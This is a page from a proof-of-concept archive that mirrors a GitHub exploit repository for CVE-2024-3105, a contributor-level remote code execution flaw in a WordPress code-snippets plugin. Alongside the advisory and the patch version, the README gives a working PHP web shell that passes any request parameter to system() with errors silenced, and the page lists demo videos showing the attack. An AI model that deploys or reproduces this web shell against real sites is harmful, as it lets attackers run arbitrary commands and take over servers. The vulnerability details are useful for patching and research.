Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-3105 PoC — Woody code snippets – Insert Header Footer Code, AdSense Ads <= 2.5.0 -Authenticated (Contributor+) Remote Code Executio

Source
https://github.com/hunThubSpace/CVE-2024-3105-PoC
Associated Vulnerability
Title:Woody code snippets – Insert Header Footer Code, AdSense Ads <= 2.5.0 -Authenticated (Contributor+) Remote Code Execution (CVE-2024-3105)
Description:The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server.
Description
A PoC Exploit for CVE-2024-3105 - The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress Remote Code Execution (RCE)
Readme
# CVE-2024-3105 (PoC)
The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server.

## Info
Base Score: **9.9 CRITICAL** \
Vector: **CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H** \
Software Type: **Plugin** \
Software Slug: **insert-php** \
Remediation: **Update to version 2.5.1, or a newer patched version** \
Affected Version: **<= 2.5.0**

## Sample PHP code
```php
<?php
    error_reporting(0);
    $cmd = "$_REQUEST[c]";
    if ($cmd == "") {
	    $cmd = "echo > NUL";
    }
    @system("$cmd");
?>
```
File Snapshot

 [4.0K]  /data/pocs/bfeb862f7e4ae39cd4ae12608f04bd1ee080e700
├── [ 17M]  RCE via shortcode.mp4
├── [ 12M]  RCE without shortcode.mp4
└── [ 881]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →